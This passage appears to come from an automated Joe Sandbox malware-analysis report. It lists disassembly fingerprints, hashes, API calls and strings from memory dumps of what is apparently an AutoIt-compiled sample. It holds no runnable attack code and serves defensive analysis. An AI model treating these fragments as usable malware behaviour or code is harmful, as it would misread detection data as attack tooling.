                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CloseErrorHandleLast__dosmaperr
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2583163307-0
                                                                                                                                                • Opcode ID: 877e8e73f19cacfde6eca087cc69cde6959f722039de1d3664405e2ce45a220a
                                                                                                                                                • Instruction ID: 2951c5aef96608812d10f05161ea9d973d640253f2745b4340211f5dbdd56c3e
                                                                                                                                                • Opcode Fuzzy Hash: 877e8e73f19cacfde6eca087cc69cde6959f722039de1d3664405e2ce45a220a
                                                                                                                                                • Instruction Fuzzy Hash: D8012B33A3567027D6AD6A346889B7E6B4D4B82774F3A0199F9188B1D3DEA0CCE18550
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,00000080,00000000), ref: 00282FF2
                                                                                                                                                • SetFileTime.KERNEL32(00000000,?,00000000,?,?,00282CD4,?,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00283006
                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0028300D
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: File$CloseCreateHandleTime
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3397143404-0
                                                                                                                                                • Opcode ID: 90681d7f935209f8fb4982483fcee962312e13013caa69ddcfe6e5ccb3713872
                                                                                                                                                • Instruction ID: 3e967af9934055cec0e07381276692268d610e4ccb1702127c25ed61c8522551
                                                                                                                                                • Opcode Fuzzy Hash: 90681d7f935209f8fb4982483fcee962312e13013caa69ddcfe6e5ccb3713872
                                                                                                                                                • Instruction Fuzzy Hash: A9E0863638131077D6312755BC0DF8B3A1CD787F71F204211F719750D08EA0550143A8
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • __Init_thread_footer.LIBCMT ref: 002217F6
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Init_thread_footer
                                                                                                                                                • String ID: CALL
                                                                                                                                                • API String ID: 1385522511-4196123274
                                                                                                                                                • Opcode ID: 63308dbfa5558b04079e4b6ae3afa6ed1f2083b3edb11274f8675b8ae0f1892e
                                                                                                                                                • Instruction ID: b2c8e2e3669a21f9443cfc41d016cfc244b4f6a8ee6dd5c5cb3e6ddf07d7e77b
                                                                                                                                                • Opcode Fuzzy Hash: 63308dbfa5558b04079e4b6ae3afa6ed1f2083b3edb11274f8675b8ae0f1892e
                                                                                                                                                • Instruction Fuzzy Hash: 78229970628212AFC714DF54E484E2ABBF1AF95304F64896DF4868B361D771E8B1CF82
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • _wcslen.LIBCMT ref: 00286F6B
                                                                                                                                                  • Part of subcall function 00214ECB: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,002E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00214EFD
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: LibraryLoad_wcslen
                                                                                                                                                • String ID: >>>AUTOIT SCRIPT<<<
                                                                                                                                                • API String ID: 3312870042-2806939583
                                                                                                                                                • Opcode ID: fc0b18ee8969470469cef67a869074cea221341f5b0061f471decec53811842e
                                                                                                                                                • Instruction ID: 3b9d8dad527a2f6fcfb2d9759e30f790a5176837a53265bca3183264bb21d154
                                                                                                                                                • Opcode Fuzzy Hash: fc0b18ee8969470469cef67a869074cea221341f5b0061f471decec53811842e
                                                                                                                                                • Instruction Fuzzy Hash: 8FB196351292019FCB14FF24C4919AEB7E5BFA4300F14895DF89A972A1DB30EDA5CF91
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Info
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1807457897-3916222277
                                                                                                                                                • Opcode ID: f5a70f2b4446618da1f796bcf2e7543960b90765d1b08cebd74720d7c9fcb53b
                                                                                                                                                • Instruction ID: 95f3f21f4ee70ec467d4147d631d1773e1775eeccc26419a28c080e3a40b3039
                                                                                                                                                • Opcode Fuzzy Hash: f5a70f2b4446618da1f796bcf2e7543960b90765d1b08cebd74720d7c9fcb53b
                                                                                                                                                • Instruction Fuzzy Hash: 08415D70515388AADF2A8E68CC84BF6BBE9EB45304F2404ECD58A87142D2759955DF20
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: __fread_nolock
                                                                                                                                                • String ID: EA06
                                                                                                                                                • API String ID: 2638373210-3962188686
                                                                                                                                                • Opcode ID: 5f1ee84d82e688af6e5d3fc18653c58418e40688e06c22081e8d19b1fda34031
                                                                                                                                                • Instruction ID: ee3fbe731c0e5fd406c75a134bf2ac52718991bf469df410a4b011a7d2b64bcb
                                                                                                                                                • Opcode Fuzzy Hash: 5f1ee84d82e688af6e5d3fc18653c58418e40688e06c22081e8d19b1fda34031
                                                                                                                                                • Instruction Fuzzy Hash: A001B5B2954258BEDF28D7A8C856FAEBBF89B05301F00455AE592D21C1E5B8E6188B60
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • LCMapStringW.KERNEL32(00000000,00000001,00000000,00000000,00000001,?,?,?,00000001,00000000,00000001,?,?,?,?,?), ref: 002434D8
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: String
                                                                                                                                                • String ID: LCMapStringEx
                                                                                                                                                • API String ID: 2568140703-3893581201
                                                                                                                                                • Opcode ID: f0497e9fb3e2d8b1df544df0929b87006e41e65c8c13a53231c71809095271ae
                                                                                                                                                • Instruction ID: 109577bf7b91feec95563cadd384a89dc93482f309c3ee8446a2bd6691358492
                                                                                                                                                • Opcode Fuzzy Hash: f0497e9fb3e2d8b1df544df0929b87006e41e65c8c13a53231c71809095271ae
                                                                                                                                                • Instruction Fuzzy Hash: 6201253261020DFBCF169F91DD06EEE3FA2EF48750F058094FE1466160CA368A30EB94
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Alloc
                                                                                                                                                • String ID: FlsAlloc
                                                                                                                                                • API String ID: 2773662609-671089009
                                                                                                                                                • Opcode ID: dcfe6030219e2a0879548e77bf64b5a83e6b0ba081c7c5b9cc2cba786ccb61a1
                                                                                                                                                • Instruction ID: 5a216de173319d32296d1ba983e8d9843f7869affc0806d961fd4342bf9088ba
                                                                                                                                                • Opcode Fuzzy Hash: dcfe6030219e2a0879548e77bf64b5a83e6b0ba081c7c5b9cc2cba786ccb61a1
                                                                                                                                                • Instruction Fuzzy Hash: 61E0AB31B6030CEBD709ABA0AC0AEADBB94EF45B51B100055FD0997240CD700F249AEA
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • try_get_function.LIBVCRUNTIME ref: 00233615
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: try_get_function
                                                                                                                                                • String ID: FlsAlloc
                                                                                                                                                • API String ID: 2742660187-671089009
                                                                                                                                                • Opcode ID: ebccb3b82c13557d573010b62f9aa6d02f342da0c9a5ce250fcb41848da7919f
                                                                                                                                                • Instruction ID: ea63d15cb0f7e05ebecccd4e49612635f1fe975bbdb37549efc2b69278935cfd
                                                                                                                                                • Opcode Fuzzy Hash: ebccb3b82c13557d573010b62f9aa6d02f342da0c9a5ce250fcb41848da7919f
                                                                                                                                                • Instruction Fuzzy Hash: FDD012326992246FC6513AD4BE0AAA9BA549B43BB2F040071FE08956919D598A3046C5
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0024C74F: GetOEMCP.KERNEL32(00000000), ref: 0024C77A
                                                                                                                                                • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0024CA1D,?,00000000), ref: 0024CBF0
                                                                                                                                                • GetCPInfo.KERNEL32(00000000,0024CA1D,?,?,?,0024CA1D,?,00000000), ref: 0024CC03
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CodeInfoPageValid
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 546120528-0
                                                                                                                                                • Opcode ID: 9605621a2b83fc382c9881dc0b4f1063d5985835c5fd6bea7b37c47fe6e56d72
                                                                                                                                                • Instruction ID: a724bd2c962543c64a9bdbb6c25e2ab132591d86bf09340b066f13b34b82820a
                                                                                                                                                • Opcode Fuzzy Hash: 9605621a2b83fc382c9881dc0b4f1063d5985835c5fd6bea7b37c47fe6e56d72
                                                                                                                                                • Instruction Fuzzy Hash: 8D514470E212069FDB689F7DC8856BABBE4EF41300F3480AFD09A8B251D7759961CF90
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00242D74: GetLastError.KERNEL32(?,?,00245686,00253CD6,?,00000000,?,00245B6A,?,?,?,?,?,0023E6D1,?,002D8A48), ref: 00242D78
                                                                                                                                                  • Part of subcall function 00242D74: _free.LIBCMT ref: 00242DAB
                                                                                                                                                  • Part of subcall function 00242D74: SetLastError.KERNEL32(00000000,?,?,?,?,0023E6D1,?,002D8A48,00000010,00214F4A,?,?,00000000,00253CD6), ref: 00242DEC
                                                                                                                                                  • Part of subcall function 00242D74: _abort.LIBCMT ref: 00242DF2
                                                                                                                                                  • Part of subcall function 0024CADA: _abort.LIBCMT ref: 0024CB0C
                                                                                                                                                  • Part of subcall function 0024CADA: _free.LIBCMT ref: 0024CB40
                                                                                                                                                  • Part of subcall function 0024C74F: GetOEMCP.KERNEL32(00000000), ref: 0024C77A
                                                                                                                                                • _free.LIBCMT ref: 0024CA33
                                                                                                                                                • _free.LIBCMT ref: 0024CA69
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _free$ErrorLast_abort
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2991157371-0
                                                                                                                                                • Opcode ID: 3e1f34d88df8945885de265aa4654b79c865d18c1bc83616568542b2fe58933c
                                                                                                                                                • Instruction ID: c5c5c1b0abf97a95952e2f2467f34f0aaf41185f723a0fe0d1545246ae23ab93
                                                                                                                                                • Opcode Fuzzy Hash: 3e1f34d88df8945885de265aa4654b79c865d18c1bc83616568542b2fe58933c
                                                                                                                                                • Instruction Fuzzy Hash: 8F31CF31911219AFDB58EFADD441AA9B7F5EF40324F31019AE8049B2A2EB719D60CF50
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00211129,00000000,00000000,00000000,?,0024328B,00000006,FlsSetValue,002B2290,FlsSetValue,00000000,00000364,?,00242E46,00000000), ref: 00243037
                                                                                                                                                • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00243044
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressProc__crt_fast_encode_pointer
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2279764990-0
                                                                                                                                                • Opcode ID: 583957ff352e3ab0bf05833a071dcb53539c047062686c40861c4a33d367a0d5
                                                                                                                                                • Instruction ID: 2ec5120f3b88a07aba3c799d905275e8e795db1d7a49bff494d2b1318eb5f88a
                                                                                                                                                • Opcode Fuzzy Hash: 583957ff352e3ab0bf05833a071dcb53539c047062686c40861c4a33d367a0d5
                                                                                                                                                • Instruction Fuzzy Hash: 57113A33A201229B9B39DE18FC40A5A7391AB807607160320FD15EB298CB31DD21C7E0
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00215773
                                                                                                                                                • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000), ref: 00254052
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CreateFile
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 823142352-0
                                                                                                                                                • Opcode ID: 2ddbf8440c241d97f99692ba3ccc239b01753d39a1e4fb38522a12910ddfb98e
                                                                                                                                                • Instruction ID: 50ca075b07c5dd43a86aeed5169755355b97c0cb95cbabd59c7470d9df10da8c
                                                                                                                                                • Opcode Fuzzy Hash: 2ddbf8440c241d97f99692ba3ccc239b01753d39a1e4fb38522a12910ddfb98e
                                                                                                                                                • Instruction Fuzzy Hash: FB018430255325F6E3311A25DC0EF97BF94DF42774F108200BA5C5A1E0CBB454A5CB90
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00233600: try_get_function.LIBVCRUNTIME ref: 00233615
                                                                                                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00233432
                                                                                                                                                • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 0023343D
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 806969131-0
                                                                                                                                                • Opcode ID: 4a9bbcdad6639d10c5f05598b7386b0dfb4d27b54206f055ff0a0c846dbef4a4
                                                                                                                                                • Instruction ID: b24fbb04a782cc9b0e2a6ade3e92b9a9c3f0babf71a9ec45e7a7d255c10c763e
                                                                                                                                                • Opcode Fuzzy Hash: 4a9bbcdad6639d10c5f05598b7386b0dfb4d27b54206f055ff0a0c846dbef4a4
                                                                                                                                                • Instruction Fuzzy Hash: 46D0A7F1634302681C05EBB5380305913445402B75FA05256E620C52C1DB6087712C16
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,00000002,?,?,?,?,00219879,?,?,?), ref: 00216E33
                                                                                                                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,?,?,?,00219879,?,?,?), ref: 00216E69
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ByteCharMultiWide
                                                                                                                                                • String ID:
